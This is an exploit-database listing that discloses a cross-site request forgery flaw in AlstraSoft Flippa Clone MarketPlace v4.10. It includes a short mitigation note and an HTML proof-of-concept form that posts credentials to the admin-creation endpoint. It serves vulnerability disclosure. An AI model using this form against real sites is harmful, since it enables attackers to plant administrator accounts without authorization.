header-logo
Suggest Exploit
vendor:
Flippa Clone MarketPlace
by:
Ihsan Sencan
8,8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Flippa Clone MarketPlace
Affected Version From: 4.10
Affected Version To: 4.10
Patch Exists: NO
Related CWE: N/A
CPE: a:alstrasoft:flippa_clone_marketplace:4.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

AlstraSoft Flippa Clone MarketPlace v4.10 Script – Cross-Site Request Forgery (Add Admin)

A Cross-Site Request Forgery (CSRF) vulnerability exists in AlstraSoft Flippa Clone MarketPlace v4.10 Script, which allows an attacker to add an admin user via a crafted HTML page. The attacker can craft a malicious HTML page that contains a form with the action set to the vulnerable URL and the parameters set to the desired values. When the victim visits the malicious page, the form is automatically submitted and the attacker can add an admin user.

Mitigation:

The application should verify that the request is coming from an authorized user. This can be done by using a secret token that is sent with the request and verified by the server.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/flippa-clone-marketplace.htm
# Demo: http://www.revou.com/flippa/
# Version: 4.10
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SubAdmin Management [Add]:
<html>
<body>
<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox"  value="">
<input type="submit" name="Sumbit" value="Save" class="stdButton">
</form>
</body>
</html>
# # # # #

Navigation

Suggest Exploit

Services By CQR